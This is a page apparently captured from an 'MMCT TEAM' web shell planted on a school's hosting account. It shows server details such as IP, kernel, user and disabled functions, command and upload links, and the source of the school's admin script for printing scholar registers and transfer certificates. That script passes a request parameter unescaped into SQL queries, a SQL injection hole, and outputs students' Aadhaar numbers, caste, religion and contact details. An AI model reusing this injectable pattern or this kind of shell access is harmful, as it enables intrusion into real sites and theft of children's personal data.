MMCT TEAM
Server IP : 2a02:4780:11:1359:0:1d43:a566:2  /  Your IP : 216.73.216.161
Web Server : LiteSpeed
System : Linux in-mum-web1259.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u490972518 ( 490972518)
PHP Version : 5.6.40
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u490972518/domains/mhischool.in/public_html/admin/../admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u490972518/domains/mhischool.in/public_html/admin/../admin/scholarprint.php
<?php
session_start();
$app1=$_REQUEST['flag'];
include("../link/databaseconnection.php");
$sel="select * from  scholar where register_no ='$app1' order by id desc";
$res=mysqli_query($conn,$sel);
$row=mysqli_fetch_array($res,MYSQLI_BOTH);

//echo"$app1";
?>

<html>
<head>
 <script src="../js/jquery-3.2.1.min.js"></script>  <!--jquery-->
<script>
$(document).ready(function(){
	$("#pay").click(function(){
		window.location.href='bil.php';
	});
});
$(document).ready(function(){

	$("#print").click(function(){
		$("#pay").css("visibility","hidden");
		$("#back").css("visibility","hidden");
		$("#print").css("visibility","hidden");
		window.print();
		
	});
	$("#back").click(function(){
		window.location.href='scholar.php';
	});
});

</script>
<style>
td{font-size:11px}
#name2{font-size:11px}
#name3{font-size:11px}


</style>
<link href="../css/student_print.css" rel="stylesheet" type="text/css">
</head>
<body>

<table frame="border" width="100%" >
<tr>
<td><img src="../images/MHI.png" style='height:90px;width:100px'></td><td colspan='4'><h2 STYLE='font-weight:bold;text-align:CENTER'> <span style='color:red'><?php echo $row['c_name']?></span><h2><center><h5><span >छात्र /छात्रा पत्रावली तथा स्थानान्तरण प्रमाण पत्र  SCHOLAR'S REGISTER & TRANSFER CERTIFICATE</span></h5></td>
<td style="font-size:13px;font-weight:bold"> </td></td></tr>

</table>
<table cellspacing="0" width="100%" border="1px" height='40px'>
<tr>
<td ><span id="name2" style="font-size:12px">प्रवेश फाईल  संख्या (Admission File No.)</span></td><td ><span id="name3" style='color:red'><?php echo $row['adm_no'];?></span></td><td ><span id="name2" style="font-size:12px">  निष्कासन फाइल  संख्या  <br/>Withdrawal  File No.</span></td><td ><span id="name3" style='color:red'><?php echo $row['withdrawal_no'];?></span></td><td ><span id="name2" style="font-size:12px">स्थानान्तरण प्रमाण पत्र संख्या  <br/>Transfer Certificate No.</span></td><td ><span id="name3" style='color:red'><?php echo $row['tc_no'];?></span></td><td ><span style='font-size:12px' id="name2">पंजिका संख्या  <br/>S.R. No.</span></td><td ><span id="name3" style='color:red'><?php echo $row['register_no'];?></span></td>
</tr>



</table>
<table cellspacing="0" width="100%" border="1px">
<tr>
<td colspan='2'><span style='font-weight:bold'><u> छात्र / छात्रा का नाम तथा राष्ट्रीयता एवं जाति यदि हिन्दू हो , अन्यथा धर्म  <br/> Name of the Scholar with Caste if Hindu,Otherwise Religion**</u></span><br/><br/>विद्यार्थी का नाम  (Student's Name) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['name'];?></span><br/>धर्म (Religion) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['religion'];?></span><br/>राष्ट्रीयता (Nationality) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['nationality'];?></span><br/>जाति (Caste)&nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['caste'];?></span></td><td ><span style='font-weight:bold'><u> पिता / संरक्षक  अथवा पति  का नाम  व्यवसाय तथा पता   <br/> Name Occupation and Address of Parents , Quardians of Husbands </u></span><br/><br/>पिता का नाम (Father's Name) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['fname'];?></span><br/>माता का नाम (Mother's Name) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['mname'];?></span><br/>व्यवसाय (Occupation) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['occupation'];?></span><br/>पता  (Address) &nbsp;=&nbsp;<span style='font-weight:bold'><?php echo $row['address'];?></span></td><td colspan=''><span style='font-weight:bold'><u>छात्र / छात्रा  की जन्मतिथि   <br/>Date Of Birth of Scholar </u></span><br/><br/><span><?php echo $row['dob'];?></span></td><td colspan='2'><span style='font-weight:bold'><u>अंतिम संस्था जिसमे पढा पढी हो  <br/>The last Institution Attended by the Scholar**</u></span><br/><br/><span><?php echo $row['last_school'];?></span></td>
</tr>
<tr>
<td colspan='2'><center> आधार नं. / Adhar No. = <span style='font-weight:bold'><?php echo $row['adhar']?></span></center></td><td> PEN.= ><?php echo $row['pen'];?> </td><td colspan='2'><center> मोबाइल नं .  / Mobile No. = <span style='font-weight:bold'> <?php echo $row['mobile']?></span></center></td><td>UDISE CODE = ><?php echo $row['ud'];?></td>
</tr>
<tr>
<td colspan='6'> जन्मतिथि शब्दों में  /  Birth Date in Words  = <span style='font-weight:bold'> <?php echo  $row['hindi_dob']?></span></td><td colspan='6'><center> <span></span></center></td>
</tr>
</table>
<table cellspacing="0" width="100%" border="1px" height='120px'>

<tr align="center">
<td><span style='font-weight:bold'>कक्षा  <br/>Class</span></td>
<td><span style='font-weight:bold'>प्रवेश  तिथि  <br/>Date of Admission</span></td>
<td><span style='font-weight:bold'>कक्षोंन्नती तिथि  <br/>Date of Promotion</span></td>
<td><span style='font-weight:bold'>निष्कासन तिथि  <br/>Date of Removal</span></td>
<td><span style='font-weight:bold;font-size:10px'>निष्कासन का कारण जैसे शुल्क का अशोधन कुटुम्ब का स्थानान्तरण निर्वासन आदि  <br/>Cause of removal i.e Non Payment of Dues<br/> Removal Old family etc.</span></td>
<td><span style='font-weight:bold' >वर्ष  <br/>Year</span></td>
<td><span style='font-weight:bold'>Conduct & Work</span></td>
<td><span style='font-weight:bold'>हस्ताक्षर <br/>  Sign</span></td>

</tr>

<?php
$sel1="select * from  promotion where scholar ='$app1'";
$res1=mysqli_query($conn,$sel1);

while($row1=mysqli_fetch_array($res1,MYSQLI_BOTH))
{
	?>
	<tr align="center">
<td><span ><?php echo $row1['class'];?></span></td>
<td><span ><?php echo $row1['date_adm'];?></span></td>
<td><span ><?php echo $row1['date_promotion'];?></span></td>
<td><span ><?php echo $row1['date_removal'];?></span></td>
<td><span ><?php echo $row1['cause_removal'];?></span></td>
<td><span ><?php echo $row1['year'];?></span></td>
<td><span ><?php echo $row1['conduct_work'];?></span></td>
<td><span ></span></td>

</tr>
	
	<?php
}

?>

</table>
<h2 style='font-weight:bold'>Note :-</h2>
<p>1.  प्रमाणित  किया जाता है छात्र / छात्रा के ब्यौरे से सम्बंधित प्रवष्टियों का मिलान प्रवेश प्रार्थना - पत्र  से कर लिया गया है और  वे पूर्णतया  शुद्ध  है  |     Certified that the entries as regards details of the student have been duly checked from the Admission form and that they are complete. <br/>
2.  प्रमाणित किया जाता है कि उपरोक्त छात्र / छात्रा  पंजिका  तथा स्थानान्तरण प्रमाण पत्र की छात्र / छात्रा के पृथक होने के दिनांक तक शिक्षा विभाग के नियमानुसार पूर्ति कर दी गयी है  |    Certified that the above Student Register have been posted up -to - date of the student's leaving are by the departmental ruls. <br/>

<b>Remarks : </b> He / She is well behave regular and hard working . He / She a good moral character  He/She always part in sport and co-curricular activities.

</p>

<br/>
<br/>
<p style='font-weight:bold'>Date :........... &emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Checked by ...............&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Principal ..........</p>


</body>
</html>

MMCT - 2023